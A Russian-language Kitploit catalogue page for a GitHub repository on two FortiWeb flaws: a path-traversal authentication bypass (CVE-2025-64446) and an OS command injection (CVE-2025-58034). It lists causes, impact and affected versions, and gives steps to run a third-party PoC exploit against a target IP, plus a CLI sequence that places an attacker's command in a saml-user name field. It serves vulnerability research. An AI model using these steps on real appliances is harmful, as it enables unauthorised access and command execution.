Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
fortinet-fortiweb-cve-2025-64446-58034 — Исследование безопасности уязвимостей Fortinet FortiWeb (CVE-2025-64446, CVE-2025-58034) | Kitploit
Инструменты/GitHubGitHub/lequoca/fortinet-fortiweb-cve-2025-64446-58034
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHublequoca/fortinet-fortiweb-cve-2025-64446-58034

fortinet-fortiweb-cve-2025-64446-58034

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Исследование безопасности уязвимостей Fortinet FortiWeb (CVE-2025-64446, CVE-2025-58034)

Репозиторий
8 месяцев назадЕщё не проверено

Изучение уязвимостей Fortinet FortiWeb (CVE-2025-64446, CVE-2025-58034)

1. Обзор

Fortinet FortiWeb — это межсетевой экран для веб-приложений (Web Application Firewall, WAF), широко развертываемый в корпоративных системах для защиты веб-приложений от распространенных угроз.

Поскольку FortiWeb обычно находится на центральном уровне защиты, уязвимости, связанные с аутентификацией или выполнением команд операционной системы, могут серьезно повлиять на всю инфраструктуру позади него. В 2025 году в FortiWeb были раскрыты две критические уязвимости:

  • CVE-2025-64446 – обход аутентификации через Relative Path Traversal

  • CVE-2025-58034 – OS Command Injection в аутентифицированном контексте

  • 2. Обзор CVE-2025-64446

2.1 Тип уязвимости

  • Relative Path Traversal
  • Authentication Bypass

2.2 Причина возникновения уязвимости

CVE-2025-64446 возникает из-за того, что FortiWeb недостаточно строго обрабатывает и проверяет путь доступа перед применением механизма аутентификации.

В частности:

  • Механизм контроля доступа, основанный на логической строке пути
  • Не выполняется полная нормализация (normalize) пути
  • Допускается использование относительных путей для доступа к внутренним ресурсам

Эта ошибка приводит к тому, что некоторые административные конечные точки (endpoint) могут быть доступны без надлежащей аутентификации.

2.3 Ущерб безопасности

  • Полный обход механизма аутентификации
  • Несанкционированный доступ к административным функциям
  • Нарушение модели разграничения прав устройства безопасности

2.4 Затронутые версии

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.4
  • FortiWeb 7.4.0 – 7.4.9
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

3. Обзор CVE-2025-58034

3.1 Тип уязвимости

  • OS Command Injection (CWE-78)

3.2 Причина возникновения уязвимости

CVE-2025-58034 возникает из-за небезопасной обработки FortiWeb пользовательских входных данных при вызове команд операционной системы.

Основные причины включают:

  • Входные параметры недостаточно проверяются
  • Отсутствует механизм фильтрации или экранирования специальных символов
  • Пользовательские данные напрямую передаются в системные команды

Данная уязвимость требует аутентифицированного контекста, но по-прежнему несет высокий уровень риска из-за возможности выполнения команд.

3.3 Ущерб безопасности

  • Непреднамеренное выполнение команд операционной системы
  • Доступ к системным ресурсам и манипулирование ими
  • Влияние на целостность и доступность устройства

3.4 Затронутые версии

  • FortiWeb 8.0.0 – 8.0.1
  • FortiWeb 7.6.0 – 7.6.5
  • FortiWeb 7.4.0 – 7.4.10
  • FortiWeb 7.2.0 – 7.2.11
  • FortiWeb 7.0.0 – 7.0.11

4. Эксплуатация (по доступному PoC - CVE-2025-64446)

4.1 Клонирование репозитория (загрузка исходного кода на компьютер)

git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034 cd CVE-2025-64446_CVE-2025-58034

4.2 Настройка виртуального окружения (venv)

Виртуальное окружение Python (venv) используется для создания независимой рабочей среды для каждого проекта, позволяя изолировать зависимости от основной системы Python. Это помогает избежать конфликтов версий библиотек, обеспечивает стабильность рабочей среды и снижает влияние на систему.

python3 -m venv venv source venv/bin/activate

4.3 Установка зависимостей:

pip install -r requirements.txt

4.4 Запуск процесса эксплуатации

python exploit.py <target_ip> image image image

5. Эксплуатация CVE-2025-58034 с помощью команд CLI (выполняемых из командной строки FortiWeb после аутентификации)

config user saml-user

edit "<YOUR COMMAND>"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

Уязвимость CVE-2025-58034 возникает из-за того, что FortiWeb недостаточно строго контролирует входные данные в некоторых полях конфигурации, особенно в значении, передаваемом через команду: edit "" Проблема: Это значение обрабатывается как строка конфигурации Затем передается во внутренние команды операционной системы Недостаточно фильтруются или экранируются специальные символы Это приводит к тому, что данные конфигурации могут напрямую влиять на выполняемую команду операционной системы, вызывая ошибку OS Command Injection.

Скачать инструмент